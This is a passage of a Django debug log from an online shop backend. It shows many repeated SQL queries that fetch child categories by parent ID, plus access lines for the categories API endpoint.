FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:50:46,845 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:50:46,847 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:50:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 09:53:34,096 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:53:34,105 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:53:34,111 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:53:34,115 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:53:34,120 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:53:34,124 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:53:34,127 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:53:34,131 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:53:34,134 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:53:34,139 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:53:34,142 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:53:34,147 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:53:34,151 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:53:34,155 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:53:34,161 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:53:34,165 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:53:34,169 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:53:34,174 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:53:34,178 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 09:53:34,185 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 09:53:34,189 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 09:53:34,193 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 09:53:34,197 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 09:53:34,201 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 09:53:34,205 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 09:53:34,212 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 09:53:34,216 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 09:53:34,220 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 09:53:34,224 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 09:53:34,228 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 09:53:34,234 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 09:53:34,238 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 09:53:34,242 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 09:53:34,246 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 09:53:34,250 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 09:53:34,256 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 09:53:34,260 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 09:53:34,265 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 09:53:34,269 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 09:53:34,273 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 09:53:34,277 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 09:53:34,282 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 09:53:34,286 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 09:53:34,290 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 09:53:34,295 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 09:53:34,299 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 09:53:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 09:54:43,033 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 09:54:43,039 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 09:54:43,043 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 09:54:43,045 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 09:54:43,048 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 09:54:43,050 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 09:54:43,052 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 09:54:43,055 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 09:54:43,057 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 09:54:43,060 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 09:54:43,062 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 09:54:43,064 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 09:54:43,067 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 09:54:43,071 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 09:54:43,076 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 09:54:43,079 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 09:54:43,082 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 09:54:43,086 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 09:54:43,089 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 